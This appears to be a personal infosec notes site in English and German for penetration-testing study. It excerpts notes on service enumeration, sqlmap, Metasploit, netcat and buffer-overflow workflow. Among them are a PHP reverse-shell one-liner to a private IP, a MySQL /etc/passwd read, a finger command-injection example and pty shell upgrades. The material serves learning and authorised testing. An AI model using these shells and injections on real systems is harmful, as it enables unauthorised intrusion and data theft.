akde/infosec

Information security is ultimately about managing risk


  • tcp/135 udp/135 — and as (Microsoft) Remote Pro­ce­dure Call on tcp/593 as web service. Enumeration Obtain gen­er­al information # rpcinfo -p $target # rpcinfo -s $target Con­nect. Hint: auto com­ple­tion works; enum<tab> returns all enum commands. rpcclient -U "" $target Enu­mer­ate through all API end­points with one of the fol­low­ing options. python /usr/local/bin/rpcdump.py $target |…


  • Enumeration Aktuell angemeldete Benutzer anzeigen finger @ip Benutzer-Enu­mer­a­tion for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done Enu­mer­a­tion mit Metasploit: msf5 > use auxiliary/scanner/finger/finger_users msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76 rhosts => 10.10.10.76 msf5 auxiliary(scanner/finger/finger_users) > run Exploits Auf sehr alten Sys­te­men kon­nte man https://insecure.org/sploits_all.html zufolge Befehle aus­führen, etwa mit finger "|/bin/id@host'


  • Use the bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to deter­mine the posi­tion of the EIP. Use bof2_socket_20.py with the found EIP off­set to ver­i­fy that the EIP was over­writ­ten with B’s. Use bof3_socket_10.py with the found EIP and find all bad chars. Find with Mona a JMP address. Cre­ate pay­load, add it and €prof­it. 0. Confirm vulnerability Down­load…


  • Note that ipt­a­bles and ip6tables should be used always together! Tables Ipt­a­bles man­ages a set of tables which act as ACL Access Con­trol Lists. Actions Actions are defined via the -j option. Examples Show all rules iptables -Lip6tables -L Ignore all pack­ets from a network: iptables -A INPUT -s 192.168.5.1/32 -j DROPip6tables -A INPUT -s fd75:943b:5f2e:0:a4:45a1:b753:4152 -j…


  • tcpdump Get incom­ing ICMP packets: sudo tcpdump -i any icmp and src host $target Nützliche Parameter Domains nicht auflösen, IPs anzeigen -n Dump der Dat­en anzeigen -X Paket in ASCII anzeigen -A Umgang mit Dateien Dump in Datei schreiben tcpdump -w file Dump aus Datei lesen tcpdump -r file Standard-Abfragen tcpdump -n src|dst 10.10.10.10 and port…


  • See a pack­et in its context Kontextmenü, Follow auswählen Show only ICMP pack­ets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show oth­er sys­tems com­mu­ni­cat­ing out­side the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wire­shark can trans­form cap­tured audio…


  • Screen-Sitzung mit Namen starten screen -S name Screen-Sitzun­gen auflisten screen -ls Screen-Sitzung fort­set­zen screen -xS name


  • Con­nect: mysql --host=10.10.10.13 -P4444 -u admin admin Var­i­ous commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the cur­rent process id: SELECT load_file('/etc/passwd'); Write as the dae­mon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…


  • Before < 2.2.10 : SQL injec­tion pos­si­ble (https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html)


  • Use dash, which does­n’t drop privileges. Argu­ments ls Order by the last recent mod­i­fied file: ls -t Better history Add this to .bashrc HISTSIZE=10000 HISTTIMEFORMAT='%F %T ' Han­dling from files with starting - cp -- -file.txt file.txt STDOUT, STDIN and STDERR (redirection) Out­put STDERR (2) also on STDOUT (1) cmd 2>&1 man Seach­ing for a key­word in…


  • Rout­ing-Tabelle ansehen netstat -r Schnelle Aus­gabe ohne DNS-Auflö­sung, nur IPs: netstat -n Nur TCP-Verbindun­gen anzeigen netstat -t Nur UDP-Verbindun­gen anzeigen netstat -u Pro­gramm anzeigen, dass offene Verbindung benutzt netstat -p Net­zw­erk­sta­tis­tik anzeigen netstat -s


  • Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…


  • https://github.com/diego-treitos/linux-smart-enumeration This script will show rel­e­vant infor­ma­tion about the secu­ri­ty of the local Lin­ux system. Quick install Details from the manual It has 3 lev­els of ver­bosi­ty so you can con­trol how much infor­ma­tion you see. In the default lev­el you should see the high­ly impor­tant secu­ri­ty flaws in the sys­tem. The lev­el 1 (./lse.sh -l1)…


  • IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM. Aufbauen  Lausche auf einem Sys­tem, dass erre­icht wer­den kann z.B. mit nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Ini­ti­iere dann die Verbindung vom Ziel­sys­tem. Hier ein Beispiel direkt in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Anderes Beispiel, z.B. direkt in ein­er Kon­sole…


  • Stan­dard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e More aggre­sive: Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5 sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell Use an exist­ing HTTP request as tem­plate. E.g. store a request in a text file: POST /index.php HTT/1.1Header: value... Then, use sqlmap with this file request.txt: sqlmap -r…


  • With knockd a serv­er can be con­fig­ured to respond only after some ports were checked before. Its often used for SSH. Couter­mea­sure: Sniff traf­fic and wait for an user to login and recon­struct the knock­ing pat­tern out of the pcaps.


  • The usu­al stuff: workspace -a host42 // To create a new workspaceworkspace host42 // To open an existing workspacedb_nmap ...hostsservices...search smb type:auxiliary...vulns // Shows all found vulnerabilitiescreds // Shows all found credentials General usage Payloads Working with sessions Using the database A data­base can be used to store infor­ma­tions, pay­loads, etc. To cre­ate a ini­tial db,…


  • Note that FTP does­n’t show hid­den files! Try in Win­dows e.g “cd ProgramData”. Enumeration With nmap. Scans a net­work for ftp servers which allow anony­mous access. nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays The FTP spec­i­fi­ca­tion defines FTP relays. One FTP serv­er can say to anoth­er FTP serv­er to send files to anoth­er third-par­ty serv­er.…


  • General notes NC / Netcat Try net­cat first on inter­est­ing ports or nar­row port ranges to be more silent Network scan Choose a port which is prob­a­bly open on sys­tems on this net­work. E.g. 445 for Win­dows hosts or 22 for Lin­ux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…


  • Linux Detect IPv6 hosts There is no arp table like in Ethernet/IPv4. But we can sim­u­late is as fol­lows to list all neight­bours / direct­ly reach­able hosts: ping6 -c 5 ff02::1%eth0 >/dev/null ip -6 neigh Bonus: ip neigh shows the IPv4 address res­o­lu­tion table like the arp com­mand does. Detect IPv6 addresses for known IPv4 addresses Sce­nario:…


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';